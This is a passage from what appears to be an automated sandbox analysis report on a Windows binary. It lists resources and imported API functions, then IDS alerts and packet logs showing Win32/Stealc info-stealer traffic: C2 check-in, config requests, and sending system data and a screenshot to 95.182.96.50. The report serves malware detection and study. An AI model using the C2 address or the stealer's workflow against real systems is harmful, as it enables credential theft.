RT_BITMAP	0x45ef98	0x17d68	Device independent bitmap graphic, 650 x 50 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.07305407619827939
RT_BITMAP	0x476d00	0x17d68	Device independent bitmap graphic, 650 x 50 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.06664276935682098
RT_BITMAP	0x48ea68	0x17d68	Device independent bitmap graphic, 650 x 50 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.06603850880786563
RT_BITMAP	0x4a67d0	0x10f68	Device independent bitmap graphic, 289 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.18508923431203225
RT_BITMAP	0x4b7738	0x1d4e8	Device independent bitmap graphic, 200 x 200 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07280906364545152
RT_BITMAP	0x4d4c20	0xf28	Device independent bitmap graphic, 80 x 16 x 24, image size 3840	English	Great Britain	0.2536082474226804
RT_BITMAP	0x4d5b48	0x5e8	Device independent bitmap graphic, 30 x 16 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07738095238095238
RT_BITMAP	0x4d6130	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.05695837657096737
RT_BITMAP	0x52ac58	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.06357373457857719
RT_BITMAP	0x57f780	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07636342672662286
RT_BITMAP	0x5d42a8	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.0946990660671048
RT_BITMAP	0x628dd0	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.04793324109304739
RT_BITMAP	0x67d8f8	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.08997175141242938
RT_BITMAP	0x6d2420	0x4228	Device independent bitmap graphic, 351 x 16 x 24, image size 16896	English	United States	0.4101322626358054
RT_BITMAP	0x6d6648	0x1a608	Device independent bitmap graphic, 2000 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	United States	0.03525546094039245
RT_BITMAP	0x6f0c50	0x1c48	Device independent bitmap graphic, 99 x 24 x 24, image size 0, resolution 2835 x 2835 px/m	English	United States	0.7501381215469614
RT_BITMAP	0x6f2898	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Russian	Russia	0.44565217391304346
RT_BITMAP	0x6f2950	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Russian	Russia	0.37962962962962965
RT_ICON	0x6f2a94	0x46c	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7535335689045937
RT_ICON	0x6f2f00	0x10ac	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6323805060918463
RT_ICON	0x6f3fac	0x25ac	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5609705516383243
RT_ICON	0x6f6558	0x422c	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	Great Britain	0.49427390791027154
RT_ICON	0x6fa784	0x548c	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	Great Britain	0.4412770282757346
RT_ICON	0x6ffc10	0x94ac	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	Great Britain	0.3825801366263794
RT_ICON	0x7090bc	0x1082c	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	Great Britain	0.31452948482876913
RT_DIALOG	0x7198e8	0xbc	data	English	Great Britain	0.7180851063829787
RT_DIALOG	0x7199a4	0x86	data	Russian	Russia	0.7014925373134329
RT_DIALOG	0x719a2c	0xbc	data	English	Great Britain	0.7180851063829787
RT_DIALOG	0x719ae8	0xb0	data	English	Great Britain	0.6875
RT_DIALOG	0x719b98	0xf0	data	English	Great Britain	0.6375
RT_DIALOG	0x719c88	0x1ac	data	English	Great Britain	0.5560747663551402
RT_DIALOG	0x719e34	0x198	data	English	Great Britain	0.5196078431372549
RT_DIALOG	0x719fcc	0xf0	data	English	Great Britain	0.6291666666666667
RT_DIALOG	0x71a0bc	0x256	data	English	Great Britain	0.44481605351170567
RT_DIALOG	0x71a314	0x148	data	English	Great Britain	0.5609756097560976
RT_DIALOG	0x71a45c	0x33c	data	English	Great Britain	0.4444444444444444
RT_DIALOG	0x71a798	0x3e4	data	English	Great Britain	0.4578313253012048
RT_DIALOG	0x71ab7c	0x31e	data	English	Great Britain	0.39849624060150374
RT_DIALOG	0x71ae9c	0x15c	data	English	Great Britain	0.632183908045977
RT_DIALOG	0x71aff8	0x78	data	English	Great Britain	0.8
RT_DIALOG	0x71b070	0x120	data	English	Great Britain	0.6284722222222222
RT_DIALOG	0x71b190	0xbc	data	English	Great Britain	0.7180851063829787
RT_DIALOG	0x71b24c	0x194	data	English	Great Britain	0.5742574257425742
RT_DIALOG	0x71b3e0	0x216	data	Russian	Russia	0.5056179775280899
RT_DIALOG	0x71b5f8	0x14c	data	Russian	Russia	0.6204819277108434
RT_DIALOG	0x71b744	0xee	data	Russian	Russia	0.680672268907563
RT_DIALOG	0x71b834	0x1d8	data	Russian	Russia	0.4766949152542373
RT_DIALOG	0x71ba0c	0x15c	data	English	Great Britain	0.603448275862069
RT_DIALOG	0x71bb68	0x40	data	English	Great Britain	0.875
RT_DIALOG	0x71bba8	0xb0	data	English	Great Britain	0.6818181818181818
RT_DIALOG	0x71bc58	0x90	data	English	Great Britain	0.7430555555555556
RT_DIALOG	0x71bce8	0x10c	data	English	Great Britain	0.6455223880597015
RT_DIALOG	0x71bdf4	0x2bc	data	English	Great Britain	0.5128571428571429
RT_DIALOG	0x71c0b0	0x124	data	English	United States	0.5821917808219178
RT_DIALOG	0x71c1d4	0x12a	data	English	Great Britain	0.6375838926174496
RT_DIALOG	0x71c300	0xe8	data	Russian	Russia	0.6336206896551724
RT_DIALOG	0x71c3e8	0x34	data	Russian	Russia	0.9038461538461539
RT_STRING	0x71c41c	0xd5e	data	English	Great Britain	0.28901227352425485
RT_STRING	0x71d17c	0x4e	data	English	Great Britain	0.717948717948718
RT_STRING	0x71d1cc	0x124	data	English	Great Britain	0.5034246575342466
RT_STRING	0x71d2f0	0x3b6	data	English	Great Britain	0.3231578947368421
RT_STRING	0x71d6a8	0x82	StarOffice Gallery theme p, 536899072 objects, 1st n	Russian	Russia	0.7153846153846154
RT_STRING	0x71d72c	0x2a	data	Russian	Russia	0.5476190476190477
RT_STRING	0x71d758	0x184	data	Russian	Russia	0.48711340206185566
RT_STRING	0x71d8dc	0x4e6	data	Russian	Russia	0.37719298245614036
RT_STRING	0x71ddc4	0x264	data	Russian	Russia	0.3333333333333333
RT_STRING	0x71e028	0x2da	data	Russian	Russia	0.3698630136986301
RT_STRING	0x71e304	0x8a	data	Russian	Russia	0.6594202898550725
RT_STRING	0x71e390	0xac	data	Russian	Russia	0.45348837209302323
RT_STRING	0x71e43c	0xde	data	Russian	Russia	0.536036036036036
RT_STRING	0x71e51c	0x4a8	data	Russian	Russia	0.3221476510067114
RT_STRING	0x71e9c4	0x228	data	Russian	Russia	0.4003623188405797
RT_STRING	0x71ebec	0x2c	data	Russian	Russia	0.5227272727272727
RT_STRING	0x71ec18	0x42	data	Russian	Russia	0.6060606060606061
RT_GROUP_CURSOR	0x71ec5c	0x22	Lotus unknown worksheet or configuration, revision 0x2	Russian	Russia	1.0294117647058822
RT_GROUP_CURSOR	0x71ec80	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ec94	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71eca8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ecbc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ecd0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ece4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ecf8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed20	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed34	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed48	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed70	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_CURSOR	0x71ed84	0x14	Lotus unknown worksheet or configuration, revision 0x1	Russian	Russia	1.3
RT_GROUP_ICON	0x71ed98	0x68	data	English	Great Britain	0.7307692307692307
RT_VERSION	0x71ee00	0x320	data	Russian	Russia	0.44
RT_MANIFEST	0x71f120	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
SHLWAPI.dll	PathFindExtensionW, PathFindFileNameW, PathStripToRootW, PathIsUNCW, PathFileExistsW, PathIsFileSpecW
KERNEL32.dll	InterlockedIncrement, FileTimeToLocalFileTime, LockFile, UnlockFile, DuplicateHandle, GetCurrentProcess, GetFileTime, SetErrorMode, GetStartupInfoW, HeapFree, HeapAlloc, RtlUnwind, HeapReAlloc, ExitProcess, HeapSize, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, SetUnhandledExceptionFilter, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetThreadLocale, GetFileType, GetStartupInfoA, HeapCreate, VirtualFree, GetSystemTimeAsFileTime, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, InitializeCriticalSectionAndSpinCount, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEnvironmentVariableA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, TlsGetValue, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesW, GetLocaleInfoW, CompareStringA, WritePrivateProfileStringW, GetPrivateProfileIntW, GetProfileIntW, GetCurrentThreadId, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, CompareStringW, GetVersionExA, GlobalSize, FreeResource, InterlockedDecrement, lstrlenA, lstrcmpA, WideCharToMultiByte, MulDiv, GetModuleHandleA, GetCurrentProcessId, GetModuleFileNameW, RaiseException, LoadLibraryA, InterlockedExchange, LocalAlloc, FlushFileBuffers, GetTickCount, QueryPerformanceCounter, SetEndOfFile, GetFullPathNameW, GetTempPathW, CompareFileTime, CreateMutexW, GetEnvironmentVariableW, GetVersionExW, InitializeCriticalSection, GetSystemTime, OpenEventW, SetFilePointerEx, GetExitCodeThread, LocalFree, SetCurrentDirectoryW, GetCurrentDirectoryW, FormatMessageW, CopyFileW, DeviceIoControl, CreateEventW, GetLocalTime, SystemTimeToFileTime, GetDriveTypeW, ResetEvent, SetEvent, lstrcmpiW, ReadFile, Sleep, WaitForSingleObject, CreateProcessW, SetFilePointer, FindNextFileW, FindClose, MultiByteToWideChar, WriteFile, FindFirstFileW, GetVolumeInformationW, DeleteFileW, GetDiskFreeSpaceExW, GetFileSizeEx, lstrcmpW, ExitThread, SetFileAttributesW, DeleteCriticalSection, GetFileAttributesExW, RemoveDirectoryW, LockResource, EnterCriticalSection, GetFileAttributesW, LeaveCriticalSection, SizeofResource, GetLogicalDrives, FreeLibrary, lstrcpynW, CreateThread, lstrcpyW, lstrcatW, lstrlenW, FileTimeToSystemTime, GetTimeFormatW, CreateDirectoryW, GetDateFormatW, GetProcAddress, SetLastError, LoadLibraryW, GetModuleHandleW, GlobalReAlloc, CloseHandle, CreateFileMappingW, GlobalFree, GetLastError, GlobalUnlock, CreateFileW, GlobalAlloc, GlobalLock, LoadResource, FindResourceW, UnmapViewOfFile, MapViewOfFile, GetFileSize, SetHandleCount
USER32.dll	PostThreadMessageW, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, MessageBeep, CharUpperW, DestroyMenu, GetSysColorBrush, GetMessageW, TranslateMessage, ValidateRect, SetWindowContextHelpId, MapDialogRect, PostQuitMessage, InflateRect, SetWindowTextW, IsDialogMessageW, RegisterWindowMessageW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, SetWindowsHookExW, CallNextHookEx, GetClassLongW, SetPropW, GetPropW, RemovePropW, GetForegroundWindow, DispatchMessageW, GetTopWindow, GetMessageTime, PeekMessageW, GetKeyState, SetMenu, GetClassInfoW, AdjustWindowRectEx, CallWindowProcW, GetMenu, SystemParametersInfoA, GetMenuItemID, GetMenuItemCount, GetSubMenu, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamW, DestroyWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowTextLengthW, GetWindowTextW, GetWindow, SetFocus, IsWindow, SetMenuItemBitmaps, SetRect, EnableWindow, SendMessageW, LoadBitmapW, GetClientRect, GetMenuCheckMarkDimensions, GetFocus, ModifyMenuW, GetMenuState, EnableMenuItem, CheckMenuItem, UnhookWindowsHookEx, GetWindowDC, GrayStringW, DrawTextExW, TabbedTextOutW, GetWindowThreadProcessId, GetLastActivePopup, IsIconic, DrawIcon, LoadIconW, GetSystemMetrics, SetForegroundWindow, FindWindowW, LoadStringW, SetCursor, SetWindowRgn, ScreenToClient, SetCapture, OffsetRect, IntersectRect, UnionRect, EqualRect, ReleaseCapture, GetWindowRect, GetMessagePos, UpdateWindow, MapWindowPoints, MessageBoxW, wsprintfW, GetParent, RegisterClipboardFormatW, SetWindowPos, GetDC, DrawTextW, InvalidateRect, PostMessageW, EnumThreadWindows, GetDlgCtrlID, IsWindowVisible, EnumChildWindows, GetClassNameW, GetWindowLongW, MoveWindow, CopyRect, DefWindowProcW, CreateWindowExW, ShowWindow, RedrawWindow, SetWindowLongW, GetWindowPlacement, RegisterClassExW, BeginPaint, DrawEdge, IsWindowEnabled, KillTimer, UnregisterClassW, FillRect, SetTimer, EndPaint, RegisterClassW, GetSysColor, ReleaseDC, IsRectEmpty, ClientToScreen, TrackMouseEvent, PtInRect, GetCursorPos, LoadCursorW, GetClassInfoExW
GDI32.dll	CreateRectRgnIndirect, CopyMetaFileW, GetMapMode, GetBkColor, GetTextColor, GetRgnBox, CreateBitmap, SetViewportExtEx, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, GetObjectW, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetWindowExtEx, GetViewportExtEx, CreateDIBitmap, SelectClipRgn, GetClipBox, SetMapMode, SetBkColor, RestoreDC, SaveDC, StretchBlt, PtInRegion, OffsetRgn, CreateRectRgn, CreateCompatibleBitmap, CreateSolidBrush, SetTextColor, CreateFontIndirectW, SetBkMode, Rectangle, GetStockObject, BitBlt, DeleteDC, CreateDIBSection, GetDeviceCaps, CreatePalette, DeleteObject, SelectObject, CreateCompatibleDC, CombineRgn, ExtCreateRegion, StretchDIBits, SelectPalette, ScaleViewportExtEx
COMDLG32.dll	GetFileTitleW, GetSaveFileNameW, GetOpenFileNameW
WINSPOOL.DRV	DocumentPropertiesW, ClosePrinter, OpenPrinterW
ADVAPI32.dll	RegOpenKeyExW, RegDeleteKeyW, RegCreateKeyExW, RegQueryValueW, RegCreateKeyW, RegOpenKeyW, RegEnumKeyW, RegSetValueExW, RegCloseKey, RegEnumValueW, RegDeleteValueW, RegQueryValueExW
SHELL32.dll	ExtractIconExW, SHGetFileInfoW, SHGetPathFromIDListW, SHGetMalloc, SHBrowseForFolderW, DoEnvironmentSubstW, ShellExecuteW
COMCTL32.dll	InitCommonControlsEx
oledlg.dll	OleUIBusyW
ole32.dll	CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CreateStreamOnHGlobal, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CLSIDFromString, CLSIDFromProgID, DoDragDrop, CoRevokeClassObject, OleIsCurrentClipboard, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoRegisterMessageFilter, OleFlushClipboard
OLEAUT32.dll	SysAllocString, OleCreateFontIndirect, SysFreeString, SysStringLen, SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, VariantCopy, SafeArrayDestroy, VariantTimeToSystemTime, SystemTimeToVariantTime
MSVFW32.dll	MCIWndCreateW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T13:54:12.911652+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:13.150722+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:13.157743+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	95.182.96.50	80	192.168.2.6	49714	TCP
2024-10-24T13:54:13.385038+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:13.392439+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.182.96.50	80	192.168.2.6	49714	TCP
2024-10-24T13:54:13.958040+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:14.430314+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:19.265599+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:20.730280+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:21.595119+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:22.218708+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:24.063009+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:24.577810+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49714	95.182.96.50	80	TCP
2024-10-24T13:54:26.562929+0200	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	192.168.2.6	49714	95.182.96.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:54:11.686813116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:11.692513943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:11.692601919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:11.693070889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:11.698414087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:12.496311903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:12.496440887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:12.499922991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:12.505575895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:12.911591053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:12.911652088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:12.915007114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:12.921401978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.150583029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.150635958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.150722027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.150751114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.152333975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.157742977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.384948015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385010004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385037899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385045052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385056019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385080099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385090113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385118008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385124922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385153055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385162115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385190964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.385194063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.385238886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.387083054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.392438889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.619102001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.619205952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.636066914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.636118889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:13.641524076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641578913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641608000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641640902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641669035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641719103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.641746998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.957953930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:13.958039999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.201070070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.206532001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430226088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430291891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430314064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430326939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430337906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430367947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430490017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430525064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430541039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430562973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430571079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430610895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.430955887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.430991888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431006908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431026936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431040049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431068897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431385994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431440115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431444883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431482077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431493044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431518078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.431525946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.431564093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.432157040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.432213068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.545844078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.545917034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.545980930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546015024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546015978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546053886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546061039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546068907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546091080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546098948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546127081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546139956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546161890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546169996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546200991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546207905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546243906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546668053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546726942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546727896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546765089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546767950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546798944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546801090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546842098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.546844006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.546890020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.547743082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.547806978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:14.547821999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.547863007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:14.547868013 CEST	49714	80	192.168.2.6	95.182.96.50
